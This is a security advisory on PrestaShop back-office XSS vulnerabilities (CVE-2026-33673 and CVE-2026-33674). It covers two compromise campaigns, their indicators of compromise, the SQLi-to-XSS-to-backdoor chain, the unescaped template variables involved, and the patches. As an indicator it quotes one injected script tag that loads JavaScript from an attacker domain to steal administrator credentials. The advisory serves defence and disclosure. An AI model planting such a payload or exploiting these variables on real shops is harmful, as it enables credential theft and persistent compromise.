24 March 2026

PrestaShop Back Office XSS Vulnerability Fix – March 2026 – [CVE-2026-33673 (and CVE-2026-33674)]

Date : 23 march 2026
Severity: HIGH
Affected versions: All PrestaShop versions
CVE: CVE-2026-33673
Patch status: Available for PS 8.2.5 and 9.1.0
Forensic research and analysis: 202 ecommerce / Prestafence
Patch author: 202 ecommerce / Prestafence

Background

Since the first half of 2025, the PrestaShop ecosystem has been targeted by two major compromise campaigns exploiting Cross-Site Scripting (XSS) vulnerabilities in the back office.

Estimated scale: 500+ compromised PrestaShop shops
Main vector: Malicious code injection via SQLi -> XSS -> Backdoor installation
Impact: Theft of administrator credentials, installation of persistent malware

Campagne 1 : softbylinux / softwarebyms

Active period: H1–H2 2025
Compromised shops: 300+ identified

Key indicator of compromise
Presence of a malicious domain in the homepage’s:

softwarebyms[.]com
softbylinux[.]com

Example of compromised code

<title>My title</title><p hidden>"<script defer src="https://softwarebyms.com/t2ps.js"></script><p hidden></title>

Vector of attack

Entry point: SQL injection into the PS_SHOP_NAME variable (ps_configuration table)
Exploitation: The injected <script> tag is not escaped in the back-office templates
Execution: When visiting the BO login page, the script is executed (XSS)
Impact: Exfiltration of administrator credentials to a malicious server

Campaign 2: i-bracket

Active period: Since Q4 2025 (since September)
Compromised shops: 200+ identified

Key indicator of compromise
Presence of a marker in the tag:
Pattern: [i]ps_[i]VERSION[i]NUMBER

Example of compromised code:

meta name="description" content="Ma boutique en ligne.[i]ps_[i]1.7.8.7[i]46011

Explanation of the marker:

ps_: Database prefix
1.7.8.7: PrestaShop version
46011: Number of orders since 1 September 2025

Attack vector (SQLi → XSS → RCE)

Step 1 – SQLi: SQL injection into a vulnerable third-party module
Step 2 – XSS: Injection of JavaScript code into the ‘firstname’ field of the ‘ps_employee’ table
Step 3 – Execution: The XSS is executed the next time an admin logs in
Step 4 – Backdoor: Automatic and silent installation of the malicious ps_analytics_enhancer module
Step 5 – Persistence: The module provides permanent access (backdoor) to the server

Note: this vulnerability chain particularly affects PrestaShop 1.7.x, where SQLi attacks are easily achievable and where there are numerous unescaped Smarty variables in the back office.

Technical vulnerability analysis

Fundamental issue: Insufficient escaping in the back-end

All versions of PrestaShop:

✅ Front-end: Smarty variables are escaped by default ({$variable} becomes {$variable|escape:“html”})
❌ Back-office: No automatic escaping in legacy templates

Consequence: Any data stored in the database (even via SQLi) and displayed in the back-office can execute arbitrary JavaScript.

Unexcaped variables exploited
Examples of vulnerable variables in legacy back-office templates:

{$shop.name} (PS_SHOP_NAME)
{$employee.firstname} / {$employee.lastname}
{$quick_access.name}
Fields in tables *_lang(descriptions produits, catégories, etc.)

More information on CVE-2026-33673

GHSA-35pf-37c6-jxjv : Legacy and modern XSS templates
Affects: All versions up to < 8.2.5 & 9.1.0
Pat c h
Related PrestaShop DevDoc

This patch fixes the escaping of several Smarty variables (legacy back-office templates) but also introduces the Twig raw_purified function into the PrestaShop core, which allows escaping to be disabled (as with raw) whilst passing the variable’s content through HTML Purifier for sanitisation.
This helps prevent XSS exploitation chains that use the modern translation system stored in the database. It is therefore important to apply all the fixes in this patch.

More informations on CVE-2026-33674

GHSA-283w-xf3q-788 : Back-office validation error
Affects: All versions up to < 8.2.5 & 9.1.0
Patch

This patch fixes form validation in the back office to prevent cross-site scripting (XSS) attacks. The isCleanHTML method has been updated to include new restricted parameters.

Resources and contacts

Official PrestaShop documentation

Tools and services

PrestaFence : WAF / 2FA / CSP
Emergency contacts: website hacked? contact [@] prestafence.com